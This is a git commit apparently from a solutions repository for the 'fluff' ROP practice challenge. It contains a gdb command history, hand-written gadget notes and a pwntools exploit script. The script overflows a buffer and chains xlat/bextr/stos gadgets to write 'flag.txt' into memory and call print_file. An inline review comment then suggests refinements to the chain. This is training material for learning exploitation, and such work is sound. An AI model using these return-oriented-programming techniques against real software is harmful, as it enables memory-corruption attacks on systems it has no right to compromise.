new file: x86_64/fluff/exploit.py

new file:   x86_64/fluff/gadgets
This commit is contained in:
Brett Weiland 2020-12-17 19:39:54 -06:00
parent 3f54969f58
commit 4c25bd9188
5 changed files with 332 additions and 0 deletions


239
x86_64/fluff/.gdb_history Normal file

@ -0,0 +1,239 @@
quit
quit
continue
nexti
nexti
info reg rdi
stepi
nexti
info reg rcx
nexti
info reg rbx
stepi
info reg rdx
inro reg rbx
info reg rbx
quit
stepi
continue
stepi
x rbx
info reg rbx
quit
conitnue
continue
stepi
info reg rbx
info reg rcx
quit
continue
stepi
info reg rbx
info reg rdx
quit
continue
stepi
info reg rbx
quit
continue
stepi
info reg rbx
quit
continue
stepi
info reg rbx
quit
continue
stepi
stepi
info reg rcx
stepi
info reg rbx
info reg rdx
quit
continue
stepi
info reg rbx
stepi
info reg rbx
quit
stepi
continue
stepi
info reg rbx
stepi
info reg rbx
quit
quit
continue
stepi
info reg rbx
quit
stepi
continue
stepi
info reg rbx
stepi
info reg rbx
quit
continue
stepi
info reg rbx
stepi
info reg rdx
quit
continue
stepi
info reg rbx
quit
continue
stepi
quit
continue
stepi
info reg rbx
quit
quit
continue
stepi
stepi
info reg rbp
stepi
info reg rax
stepi
info reg rax
stepi
info reg rdi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
q
continue
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
quit
conitnue
continue
continue
stepi
quit
x 0x0000000000400000
x/c 0x0000000000400000
x/c 0x00000000004003c4
x/c 0x0000000000400000
quit
continue
stepi
x/s 0x601be0
x/c 0x0000000000400251
stepi
stepi
x/s flag.txt
x/s 0x601be0
quit
watch *0x601be0 + 7
continue
x/s 0x601be0
continue
x/s 0x601be0
x/s 0x601be1
x/s 0x601be0
x/s 0x601be7
continue
x/s 0x601be7
x/s 0x601be0
continue
quit
watch *0x601be4
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s $rdi
x/s 0x601be0
quit
continue
x/s 0x601be0
quit
break *0x00000000004006a3
continue
context
stepi
x/s $rdi
stepi
quit
break *0x00000000004006a3
continue
context
c/s 0x7ffdf0faba10 - 8
x/s 0x7ffdf0faba10 - 8
x/s 0x7ffdf0faba10 - 4
x/s 0x7ffdf0faba10 - 16
x/x 0x7ffdf0faba10 - 8
x/x 0x7ffdf0faba10
x/x 0x7ffdf0faba10 = 4
x/x 0x7ffdf0faba10 - 4
x/x 0x7ffdf0faba10 + 4
context
info reg rdi
info reg rip
search
search 0x601be0
search --qword 0x601be0
search --qword 0x601be0 --writable
search --qword 0x0000000000400510 --writable
context
continue
stepi
continue
stepi
quit
break *0x00000000004006a3
continue
stepi
continue
x/i 0x400639
x/10i 0x400639
quit
break *0x400639
conitnue
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
quit
break *0x400639
continue
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s 0x601be0
x/x 0x601be0 + 8
x/x 0x601be0 + 9
x/x 0x601be0 + 10
quit

x86_64/fluff/core Normal file


49
x86_64/fluff/exploit.py Executable file

@ -0,0 +1,49 @@
#!/usr/bin/env python3
from pwn import *
letter_lookups = {
'f' : 0x00000000004003c4,
'l' : 0x0000000000400239,
'a' : 0x00000000004003d6,
'g' : 0x00000000004003cf,
'.' : 0x0000000000400251,
't' : 0x0000000000400192,
'x' : 0x0000000000400246}
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
for c in string:
payload += p64(0x40062a)
payload += p64(0x4000) # if things go wrong, check endian/order
payload += p64(letter_lookups[c] - 0x3ef2)
payload += p64(0x0000000000400610)
payload += p64(0)
payload += p64(0x400628)
payload += p64(0x400639)
return(payload)
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()
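Review bot: write_str leaves the string it builds unterminated, so the print_file call on the three lines after it relies on the bytes following 0x601be0 + 8 already being zero, which the `x/x 0x601be0 + 8` / `+ 9` / `+ 10` probes in the accompanying .gdb_history suggest was checked by hand rather than guaranteed by the chain. Because 0x400610 already zeroes eax, a NUL can be emitted with three more qwords after the loop: `payload += p64(0x0000000000400610); payload += p64(0); payload += p64(0x400639)` — stos then stores al=0 at the current rdi. `payload += b"\n"` directly before `prog.sendline(payload)` sends two newlines, and `str(prog.recv(), 'UTF-8')` raises UnicodeDecodeError if anything non-UTF-8 comes back, so `prog.recv().decode(errors='replace')` is safer. The `'.'` entry in letter_lookups (0x400251) also disagrees with the gadgets notes in this commit (0x400000); the `x/c 0x0000000000400251` probe in .gdb_history suggests exploit.py holds the verified value, so the notes are the side to correct. The gdb.debug wrapper with a hardcoded `break *pwnme + 151` is debugging residue that should become `process('./fluff')` before this is treated as the finished exploit.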

44
x86_64/fluff/gadgets Normal file

@ -0,0 +1,44 @@
Memory bytes information
=======================================================
0x00000000004003c4 : 'f'
0x0000000000400239 : 'l'
0x00000000004003d6 : 'a'
0x00000000004003cf : 'g'
0x0000000000400000 : '.'
0x0000000000400192 : 't'
0x0000000000400246 : 'x'
0x0000000000400192 : 't'
0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx
***
40062a: 5a pop rdx
40062b: 59 pop rcx
40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2
400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx
#rdx is controller.
rdx bits 0-7: starting bit
rdx bits 8-15: length
***
400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi
# requires rdi (check), al
0000000000400510 : print_file@plt
0x00000000004006a3 : pop rdi ; ret
exploit:
write to memory using al as letter
set al to zero
set rbx to memory location
rcx: (location - 0x3ef2) before bextr
rdx: 0x00 0x20 (from position zero, using 32 bits)